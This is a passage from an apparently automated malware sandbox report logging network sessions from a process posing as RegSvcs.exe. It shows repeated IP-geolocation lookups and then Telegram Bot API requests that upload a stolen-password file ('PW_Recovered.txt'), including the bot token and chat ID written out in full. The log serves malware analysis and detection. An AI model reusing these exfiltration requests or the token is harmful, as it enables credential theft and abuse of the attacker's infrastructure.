                                                                          2024-09-19 10:21:23 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                          2024-09-19 10:21:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          13192.168.2.549733188.114.97.34435688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:21:24 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                          Host: reallyfreegeoip.org
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:21:24 UTC702INHTTP/1.1 200 OK
                                                                          Date: Thu, 19 Sep 2024 10:21:24 GMT
                                                                          Content-Type: application/xml
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          access-control-allow-origin: *
                                                                          vary: Accept-Encoding
                                                                          Cache-Control: max-age=86400
                                                                          CF-Cache-Status: HIT
                                                                          Age: 15040
                                                                          Last-Modified: Thu, 19 Sep 2024 06:10:44 GMT
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jefl0WyMNW5ehSpmLw0w01lB8TSgtJD20Jhy4UBg6Fj547XjN38A14Izfk8dRIn2YU3iB7VBLTLFlMOfZIx65RjI53ks8JYCHIDSGtk8IaOPrDStpKnO4%2BXBun0ASiGBBiOVrb6g"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8c58d946cf0432d9-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-09-19 10:21:24 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                          2024-09-19 10:21:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          14192.168.2.549735188.114.97.34435688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:21:26 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                          Host: reallyfreegeoip.org
                                                                          2024-09-19 10:21:26 UTC712INHTTP/1.1 200 OK
                                                                          Date: Thu, 19 Sep 2024 10:21:26 GMT
                                                                          Content-Type: application/xml
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          access-control-allow-origin: *
                                                                          vary: Accept-Encoding
                                                                          Cache-Control: max-age=86400
                                                                          CF-Cache-Status: HIT
                                                                          Age: 15042
                                                                          Last-Modified: Thu, 19 Sep 2024 06:10:44 GMT
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d%2BSAMf0clIKj074PE0zjd13yvjQgu7gg%2F930JmTZ4GKWMlk0CkuIdQUtwVFDaFGuQgkeD3rqMjjuOmSquGqf%2BnJLy3yMbqSfx9zrh0%2B3AaUG%2BnOyB3DYTz32prd5krKL3%2F0QzWsS"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8c58d94f1b748cd7-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-09-19 10:21:26 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                          2024-09-19 10:21:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          15192.168.2.549737188.114.97.34435688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:21:27 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                          Host: reallyfreegeoip.org
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:21:27 UTC712INHTTP/1.1 200 OK
                                                                          Date: Thu, 19 Sep 2024 10:21:27 GMT
                                                                          Content-Type: application/xml
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          access-control-allow-origin: *
                                                                          vary: Accept-Encoding
                                                                          Cache-Control: max-age=86400
                                                                          CF-Cache-Status: HIT
                                                                          Age: 15043
                                                                          Last-Modified: Thu, 19 Sep 2024 06:10:44 GMT
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vu8%2BcfxRTCULZoqBHa%2FYTA95mrmYfBNtEY2g0N1jrA5Ghz133%2BlK37NDiTzQOpwimFFScgZndshxFWSwXLKk0t093cZywRrVN%2FJBE6THVdlylwe7CTHIOGT4MU%2Fyytdn%2FuQ7qwEv"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8c58d9574b464232-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-09-19 10:21:27 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                          2024-09-19 10:21:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          16192.168.2.549739188.114.97.34435688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:21:28 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                          Host: reallyfreegeoip.org
                                                                          2024-09-19 10:21:28 UTC710INHTTP/1.1 200 OK
                                                                          Date: Thu, 19 Sep 2024 10:21:28 GMT
                                                                          Content-Type: application/xml
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          access-control-allow-origin: *
                                                                          vary: Accept-Encoding
                                                                          Cache-Control: max-age=86400
                                                                          CF-Cache-Status: HIT
                                                                          Age: 15044
                                                                          Last-Modified: Thu, 19 Sep 2024 06:10:44 GMT
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JI5jxRkTOaecQQ%2BY3QNWI6qufhM9t6hNSuZkV9huW2e6n6l39GJPNLA63PtbRPfZ%2BSiK7hubdggYdonEydcuY%2BKivd8Zz%2BxuvUgDZ45Ss8bPecsoWSY3dnri4hetmlpzZF36F%2BLo"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8c58d95f796f43dd-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-09-19 10:21:28 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                          2024-09-19 10:21:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          17192.168.2.549741188.114.97.34435688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:21:30 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                          Host: reallyfreegeoip.org
                                                                          2024-09-19 10:21:30 UTC706INHTTP/1.1 200 OK
                                                                          Date: Thu, 19 Sep 2024 10:21:30 GMT
                                                                          Content-Type: application/xml
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          access-control-allow-origin: *
                                                                          vary: Accept-Encoding
                                                                          Cache-Control: max-age=86400
                                                                          CF-Cache-Status: HIT
                                                                          Age: 15046
                                                                          Last-Modified: Thu, 19 Sep 2024 06:10:44 GMT
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tcUDKsT2tUmgcvVWWQXHqzM6sfaSFDvRiq6L0dGEjWgqCN2hMxb4kiOPxREnDFvqooOC%2BdUxB1ku%2B1BKcex%2BZdJvrw7i5f5TrcwGUeB0pJ7cR2ECyoqSKaWKj30p5qjtRN2Zut0P"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8c58d967aa3b18a1-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-09-19 10:21:30 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                          2024-09-19 10:21:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          18192.168.2.549743188.114.97.34435688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:21:31 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                          Host: reallyfreegeoip.org
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:21:31 UTC702INHTTP/1.1 200 OK
                                                                          Date: Thu, 19 Sep 2024 10:21:31 GMT
                                                                          Content-Type: application/xml
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          access-control-allow-origin: *
                                                                          vary: Accept-Encoding
                                                                          Cache-Control: max-age=86400
                                                                          CF-Cache-Status: HIT
                                                                          Age: 15047
                                                                          Last-Modified: Thu, 19 Sep 2024 06:10:44 GMT
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wpkfckMbCw54cn3ZbChwyAdRkx4wcPMn5xUnsMwor0UQxkKG%2BTYfp0yQltQKUFgCnDDm9lCI3wZhAalCjJVdfwh2HazJecNVjW9Wp1xzmqRnA8pJBw0Zkok6H9v568ADxzjYGgCC"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8c58d96fce4c0fa7-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-09-19 10:21:31 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                          2024-09-19 10:21:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          19192.168.2.549744149.154.167.2204435688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:21:32 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20and%20Time:%2019/09/2024%20/%2021:04:09%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965543%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                          Host: api.telegram.org
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:21:32 UTC344INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:21:32 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 55
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:21:32 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                          Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          20192.168.2.561513149.154.167.2204431488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:21:39 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dcd9999c7f3372
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:21:39 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 39 39 39 39 63 37 66 33 33 37 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 30 34
                                                                          Data Ascii: --------------------------8dcd9999c7f3372Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:04
                                                                          2024-09-19 10:21:39 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:21:39 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:21:39 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 34 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12742,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          21192.168.2.561517149.154.167.2204431488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:21:43 UTC345OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dcd9aa313f3835
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          2024-09-19 10:21:43 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 39 61 61 33 31 33 66 33 38 33 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 30 34
                                                                          Data Ascii: --------------------------8dcd9aa313f3835Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:04
                                                                          2024-09-19 10:21:43 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:21:43 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
